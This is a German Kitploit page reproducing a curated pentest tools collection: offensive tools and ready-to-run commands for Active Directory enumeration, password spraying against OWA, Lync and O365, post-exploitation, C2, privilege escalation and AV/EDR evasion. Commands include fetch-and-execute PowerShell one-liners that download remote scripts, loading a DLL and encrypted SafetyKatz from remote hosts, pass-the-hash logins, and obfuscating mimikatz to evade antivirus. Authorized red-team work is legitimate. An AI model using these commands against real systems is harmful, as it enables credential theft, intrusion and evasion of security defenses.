Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Pentest-Tools-Collection — Kuratierte Sammlung von offensiven Sicherheitstools und -befehlen für Active-Directory-Angriffe, C2, Privilege Escalation, Verschleierung und Web-Pentesting. | Kitploit
Tools/GitHubGitHub/luemmelsec/pentest-tools-collection
Privilege EscalationExploitationIDS/IPS-UmgehungInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlRed TeamingKuratierte RessourcenPayload-Entwicklung
GitHubluemmelsec/pentest-tools-collection

Pentest-Tools-Collection

Kuratierte Sammlung von offensiven Sicherheitstools und -befehlen für Active-Directory-Angriffe, C2, Privilege Escalation, Verschleierung und Web-Pentesting.

Repository anzeigen
906146vor 28 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Pentest-Tools-Sammlung

Active Directory

AMSI

https://amsi.fail/

Tool-Sammlungen

WinPwn

https://github.com/S3cur3Th1sSh1t/WinPwn

Import-Module .\WinPwn.ps1

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Ghostpack

https://github.com/GhostPack

Seatbelt, KeeThief, Rubeus, SharpUp ...

Powersploit

https://github.com/PowerShellMafia/PowerSploit

PowerView, PowerUp, Get-GPPPassword ...

Enumeration

Bloodhound

https://github.com/BloodHoundAD/BloodHound

SharpHound.exe -d testdomain.com -c all,gpolocalgroup

Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup

https://github.com/fox-it/BloodHound.py

bloodhound.py -c all

ADRecon

https://github.com/adrecon/ADRecon

So führen Sie ADRecon auf einem Domänenmitglieds-Host aus.
PS C:\> .\ADRecon.ps1

So führen Sie ADRecon auf einem Domänenmitglieds-Host als anderer Benutzer aus.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

So führen Sie ADRecon auf einem Nicht-Mitglieds-Host über LDAP aus.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>

Spraying-Toolkit

https://github.com/byt3bl33d3r/SprayingToolkit

Lync/Skype- & OWA-Sprayer, Wordlist-Generator, Namensschema-Konverter usw.

OWA-Spraying
./atomizer.py owa contoso.com 'Fall2018' emails.txt

Lync-Spraying
./atomizer lync contoso.com --user-as-pass usernames.txt

Recon-Modus
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

MailSniper

https://github.com/dafthack/MailSniper

OWA & EWS angreifen
Das Namensschema sollte wie testdomain.com\schmidta oder aschmidt aussehen -> Schema mit dem msf-Modul prüfen

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Get-ADUsernameFromEWS -EmailList email-list.txt

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt

msspray

https://github.com/0xZDH/msspray

O365-Enum- & Spray-Tool

Nur Benutzer enumerieren, ohne zu sprayen. Benötigt eine Textdatei mit vollständigen E-Mail-Adressen im Format [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose

MSOLSpray

https://github.com/dafthack/MSOLSpray

O365-Sprayer

Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

ExchangeRelayX

https://github.com/quickbreach/ExchangeRelayX

EWS über NTLM-Authentifizierung per HTTP angreifen.

./exchangeRelayx.py -t https://mail.quickbreach.com

SharpView

https://github.com/tevora-threat/SharpView

Portierung von PowerView auf .NET

SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password

CrossLinked

https://github.com/m8r0wn/CrossLinked

E-Mail-Adressen / Benutzer sammeln

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name

Post-Exploitation

impacket

https://github.com/SecureAuthCorp/impacket

Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

Offizielle Doku: https://mpgn.gitbook.io/crackmapexec/

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

EvilWinRM

https://github.com/mrnamp/EvilWinRM

Ein Tool zur Interaktion mit Microsofts WS-Management-Implementierung, auch bekannt als Powershell-Remoting, von einem Linux-Rechner aus.
Kann auch verwendet werden, um sich mit einem Hash anstelle eines Passworts zu verbinden.

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099

Kann danach auch C#, DLLs oder Donut-Shellcode direkt im Speicher ausführen. Die ausführbaren Dateien müssen sich in dem Pfad befinden, der mit dem Argument -e festgelegt wurde.

Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

Dll-loader -http -path http://10.11.12.13/evil.dll

Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin

Kann auch AMSI umgehen, Kerberos-Tickets abrufen und so weiter ...

SharpRDP

https://github.com/rasta-mouse/SharpRDP

Führt Aktionen über RDP aus. Der Benutzer erhält eine Benachrichtigung, wenn Multi-RDP nicht aktiviert ist!

SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password

Inveigh

https://github.com/Kevin-Robertson/Inveigh

PowerShell-ADIDNS/LLMNR/mDNS/NBNS/DNS-Spoofer und Man-in-the-Middle-Tool

Import-Module Inveigh.psm1

Invoke-Inveigh -Consoleoutput Y

Responder

https://github.com/lgandx/Responder

LLMNR/NBT-NS/mDNS-Poisoner

./Responder.py -I eth0

C2

Covenant

https://github.com/cobbr/Covenant

PS-Empire

https://github.com/BC-SECURITY/Empire

PrivEsc

WinPEAS / LinPEAS

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SecWiki

https://github.com/SecWiki

Exploits für Linux & Windows

PowerShDll

https://github.com/p3nt4/PowerShdll

PowerShell ohne PowerShell

rundll32 PowerShdll,main -w

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

UACME

https://github.com/hfiref0x/UACME

Watson

https://github.com/rasta-mouse/Watson

PrivescCheck

https://github.com/itm4n/PrivescCheck

Obfuskation

PEzor

https://github.com/phra/PEzor

C/C++-Binaries obfuskieren

Neues Modul -> ShellCode fluctuation:

PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'

Siehe https://twitter.com/phraaaaaaa/status/1453389564383404032?t=wcB-3NlNh9725L9_zRjdHg

Donut Syscall fork

https://github.com/S4ntiagoP/donut/tree/syscalls

Fork des Donut-Shellcode-/PE-Generators mit Syscalls

amber

https://github.com/EgeBalci/amber

C/C++-Binaries obfuskieren

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

Obfuskator für PowerShell-Skripte.

xencrypt / BetterXencrypt

https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt

AQUARMOURY (in special wraith)

https://github.com/slaeryan/AQUARMOURY

Sammlung von Tools zur Umgehung von AV/EDR und Ähnlichem

root@kitploit:~
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100

Obfuskator und Verschlüsselungstool für PowerShell-Skripte.

ISESteroids

https://www.powershellgallery.com/packages/ISESteroids/2.7.1.7

Toolsammlung für PowerShell ISE. Obfuskationsmöglichkeiten.

PS2EXE

https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5

Konvertiert PS1 in eine EXE-Datei.

Invoke-Sharploader

https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader

Ein Wrapper für C#-Binaries, der die Payload verschlüsselt und im Speicher entschlüsselt.

Binärdatei verschlüsseln:

Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Verschlüsselte Binärdatei von URL laden:

Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs

Verschlüsselte Binärdatei von der Festplatte mit Befehlszeilenargumenten laden:

Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

inceptor

https://github.com/klezVirus/inceptor

Obfuskator für C# und PowerShell

Chimera

https://github.com/tokyoneon/Chimera

Obfuskator für PowerShell-Skripte

InvisibilityCloak

https://github.com/xforcered/InvisibilityCloak

Obfuskator für C#-Assemblies

ConfuserEx

https://github.com/yck1509/ConfuserEx

Obfuskator für C#-Assemblies

Charlotte

https://github.com/9emin1/charlotte

Shellcode-Loader über D-Invoke

AVCleaner

https://github.com/lleon1435/avcleaner

Obfuskator für C/C++-Quellcode

Verschiedenes

SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray

Web

JSFScan: https://github.com/KathanP19/JSFScan.sh

Tool herunterladen